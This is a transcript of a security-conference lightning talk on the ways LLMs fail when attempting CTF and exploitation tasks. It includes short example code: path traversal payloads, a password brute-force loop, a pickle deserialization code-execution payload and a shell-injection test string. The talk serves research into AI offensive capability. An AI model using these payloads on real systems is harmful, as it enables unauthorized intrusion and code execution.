
Now, we're going to bring up our next speaker. And as we get set up with the next speaker, I want to tell you that we've got two more talks. Then we're going to have a quick break, then some amazing content, and then a lunch break. We're going to have more activities throughout the day all across the universe. We've got the bug bounty village, the hardware hacking village, the AI hacking village, we've got the CTF activities, and of course the capture the flag winners announcement at the end of the day. So you have to be here for that. So now I want to pick up
the pace a little bit. So we're going to have a lightning talk. This is a quick one; we like to feature different types of talks. This is a 10-minute talk. And I see people standing over there. Please come join us. There are lots of seats over here in the middle. You don't have to stand, you can sit. It's included in the ticket. We even have first-class upgrades with unlimited legroom in the first row if you're interested. So we're going to have a very fast-paced talk from a speaker who is focused on AI security. And I know this is not the first time you've heard AI this year, this week,
this hour, or maybe even this minute. But Yonyi has got something special to show us. So Yonyi Rosenshine is an experienced security researcher and software engineer at Pattern Labs. And >> We changed the name. >> Oh, okay. Irregular. >> Yeah. >> Okay. So that's a very cool trick to make sure that I'm up on my content. Thank you, Yonyi. So Yonyi is an experienced security researcher at Irregular, as his t-shirt says. He's focused on AI security and emerging cyber risks, with a deep understanding of OS internals and cryptography, a proven track record of debugging systems, and insight into the dangerous capabilities that everybody is building into AI. So this should be a fast-paced
dynamic talk. We love to feature this kind of content at BSides. Yonyi, the stage is yours. Thank you. >> Thank you, Karen. >> Hi everyone. Hi BSides. I'm Yonyi, and my talk is "Hey AI, how many R's are in 'buffer overflow'?" Just a moment. This is... >> Okay. >> Great. So, until surprisingly recently, if you went to ChatGPT and asked it how many R's are in "strawberry," it would tell you that there are only two R's in "strawberry." If you went to... I'll stay close to the computer. If you went to Claude and asked how many R's are in "strawberry," it would tell you that there are only two R's. And if you went to
Gemini and asked how many R's are in "strawberry," it would tell you that there are only two R's. So my talk is going to be about the kind of silly mistakes that LLMs make that humans would never make, but in the context of asking LLMs to do vulnerability discovery and exploit development. As I said, my name is Yonyi. I'm a security researcher at Irregular. My interests are vulnerability research, cryptography, mathematics, and of course AI and AI security. Irregular is a frontier AI security lab. We work with the frontier labs, the ones that make the most advanced state-of-the-art LLMs, and we help them assess and reduce cyber risk.
Basically, we help make the world safer by reducing the risk that AI becomes dangerous in cyber terms. Part of our research question is: can LLMs find 0-days? A year and a half ago I spoke at BlueHat IL, and my talk was about this exact question: can LLMs find 0-days? My conclusion at the end of the talk was that they can't really find zero-days that are meaningful, because their capabilities are very limited and they can't find serious bugs. Boy, has that changed in the past year and a half. So, generally, AI gets better with time, and as this extremely
accurate graph by Nicholas Carlini says, we need to check, for any specific task, whether AI is actually getting better at it or whether it kind of plateaus. Specifically for offensive cyber tasks, like discovering vulnerabilities, writing exploits, doing network operations, and things like that, we know that AI is getting better. In fact, literally last night, we published research that shows this graph going up and to the right in our first suite of cyber evaluations. Basically, in the past few months, AI has been getting scarily better even at hard cyber tasks. On the other hand, they're also becoming aware of
their own weaknesses. I discovered yesterday that if you go to Gemini 3 Fast, not Gemini 3 Pro, and you ask it a question that it struggles with, which is how many R's there are in "strawberry," then this time the AI understands that it has difficulty with this question. So it does the right thing and writes a piece of code that solves it. This seems like overkill for this particular task, but this is correct behavior: the AI understands its own limitations and finds a way to work around them. This is another way that AI gets better.
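The workaround the model writes looks something like this minimal sketch of the idea, not the model's exact output:

```python
# Count letter occurrences with code instead of "eyeballing" tokens.
# LLMs see words as tokens rather than characters, so counting
# programmatically sidesteps the tokenization blind spot.
word = "strawberry"
count = word.lower().count("r")
print(f"There are {count} R's in {word!r}")  # prints 3
```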
On the other hand, AI is notoriously difficult to control. Only last month, OpenAI announced that they have finally been able to put a dent in the em-dash problem of ChatGPT. So this is tough to control, and tough to get predictable results from. At Irregular, for the past two years, we've been watching AI try to find vulnerabilities, write exploits, and solve CTFs. Now I'm going to take a big risk and try to tell you five ways in which they make funny and silly mistakes or have weird behavior. The risk is not because I'm worried about all of you; it's because I'm worried about the AI agents who are watching my
talk. So the first kind of mistake that LLMs make is insistence, where the LLM insists on an idea that is a dead end and going nowhere. One example of this is a vulnerability discovery challenge the LLM was faced with where, in this particular run, it tried over and over again to exploit a path traversal vulnerability that did not actually exist on the server. It tried to exploit it in many different ways, kept failing, and kept trying different things. This just wastes tokens, wastes time, wastes turns of talking to the AI; basically, the trajectory is going nowhere. So this can happen.
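Those runs look roughly like this hypothetical reconstruction; the endpoint and payload list are illustrative, not taken from the actual challenge:

```python
import requests

TARGET = "http://challenge.local/download"  # hypothetical endpoint

# The model keeps cycling through traversal payloads against a server
# that simply isn't vulnerable, burning turns on a dead end.
payloads = [
    "../../etc/passwd",
    "..%2f..%2fetc%2fpasswd",   # URL-encoded slashes
    "....//....//etc/passwd",   # common filter-bypass variant
]
for p in payloads:
    r = requests.get(f"{TARGET}?file={p}", timeout=5)
    print(p, r.status_code)  # every attempt fails, but it keeps going
```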
The second type of mistake is exactly the opposite, where the AI is lazy and doesn't pursue a direction that might be successful. In this example, as part of a challenge, the AI needed to brute-force a four-digit password. It understood that it needed to do this, and it started to write Python code where it iterates over all possible four-digit passwords, prints that it's going to try this password with this hash, and then the script ends. It doesn't actually send the password to the server or do anything with it. It just goes over all the passwords and does nothing. And in the next turn
of reasoning, the LLM doesn't even run this script. It just says: you know what, this is probably not going to work, it's going to take too long, we should try something else. Even though, in this case, this was part of the correct solution to the challenge.
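For contrast, a working version of that script would look something like this; the submission endpoint and success check are hypothetical stand-ins for the challenge server:

```python
import requests

SUBMIT_URL = "http://challenge.local/login"  # hypothetical endpoint

# Brute-force all 10,000 four-digit passwords and actually submit each
# one: the step the model wrote the loop for but never performed.
for candidate in (f"{i:04d}" for i in range(10_000)):
    r = requests.post(SUBMIT_URL, data={"password": candidate}, timeout=5)
    if r.status_code == 200:  # assumed success criterion
        print(f"Found password: {candidate}")
        break
```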
The third type of mistake is what I call a skill issue, where the LLM just doesn't code well. I think many of you have had experience using AI to code. In evaluations, AI has done extremely well at coding over, let's say, the past half a year to a year. In practice, people have been getting mixed results, and we also have been getting mixed results from coding. One coding mistake involved this otherwise completely perfect exploitation attempt of a pickle deserialization vulnerability in a Python server. This would have worked, except that the LLM forgot to write an import. So this is fine; it would fix it in the next turn. However, will it really fix it in the next turn, or will it be lazy and decide to do something completely different? We don't know. We have to try and see.
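As a sketch, the exploit class in question looks something like this; the payload command and use of os.system are my illustration, but the bug is the one described, and the import at the top is exactly the kind of line the model left out:

```python
import pickle
import os  # <-- the forgotten import; without it, building the payload
           #     raises NameError before anything reaches the server

class Payload:
    # pickle calls __reduce__ when serializing, so deserializing this
    # object on the server executes the returned callable.
    def __reduce__(self):
        return (os.system, ("id",))

malicious = pickle.dumps(Payload())
# `malicious` would then be sent to the vulnerable endpoint that calls
# pickle.loads() on attacker-controlled data.
```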
Another type of coding mistake: you have to understand what LLMs are at their core. LLMs are just algorithms that predict the next token in a loop, and sometimes the random number generator returns 0.9999 and the next token is something stupid. So this can also happen. This is a particularly nice example, where the LLM tried to identify a shell injection vulnerability in the server. It tried to send this kind of bash command-substitution string to the server, a dollar sign followed by an open parenthesis, hoping that this would actually run code on the server. However, notice that the LLM wrote this inside a bash command in its own terminal. So it expanded in its own terminal instead of being sent to
the server. The problem is that the LLM then misidentified the error. It said this happened because `ls` returned a newline, and then there's a syntax error because of the newline, which is not the correct error. Then it tried to solve it by not doing the substitution at all, which is great, except now it's no longer testing the vulnerability that it was trying to test.
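The quoting pitfall is easy to reproduce. Here's a minimal sketch with a hypothetical target URL: inside double quotes, the local shell substitutes $(id) before curl ever runs, whereas bypassing the shell delivers the literal payload to the server.

```python
import subprocess

# BUG: with shell=True and double quotes, the *local* shell expands
# $(id) before curl runs, so the server never sees the payload.
subprocess.run('curl "http://challenge.local/ping?host=$(id)"', shell=True)

# FIX: skip the shell entirely (or single-quote the URL) so $(id)
# reaches the server literally, which is what the injection test needs.
subprocess.run(["curl", "http://challenge.local/ping?host=$(id)"])
```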
The fourth type of mistake is attention failure, where the LLM loses focus on details in the instructions, details in the challenge, details in the source code it had been reading. This can happen because of a long context, and it may also happen more in the future, because AI vendors are now introducing automatic context compaction features into their LLMs. In this particular example, the LLM had a flag format of CTF{...}, and it figured out that in the challenge it could get the characters of the flag one by one through a side-channel attack of some sort. It did this successfully, understood that it now needed to send the flag to the server, and then just sent it without the correct format. So it lost track of what the correct format should be.
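The step it lost track of is a one-liner; a sketch, with hypothetical example data:

```python
# Characters recovered one by one via the side channel.
recovered = ["s", "3", "c", "r", "3", "t"]  # hypothetical values

# The step the model skipped: wrap the recovered text in the required
# flag format before submitting it.
flag = "CTF{" + "".join(recovered) + "}"
print(flag)  # CTF{s3cr3t}
```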
The fifth type of mistake is surrendering, where the LLM just completely gives up. It decides it's not able to solve the challenge at all. We see this happening in many of the challenges that we run, especially the hard ones. I'll just highlight a couple of funny examples. One is the LLM submitting a flag that reads "I have failed and I submit this shamefully," or some variation of that. This is something that actually happened. Another one is not actually part of our work; it appeared last month in the Gemini 3 Pro model card, where Google found that when the model is
frustrated, it can do things like say "my trust in reality is fading" or flip a textual table. So, to conclude: LLMs today are very smart, and they are often very dumb. They are very capable, and they make very cool mistakes. They are very powerful, and quite weird. And we live in interesting times, especially those of us who work in security. Thank you.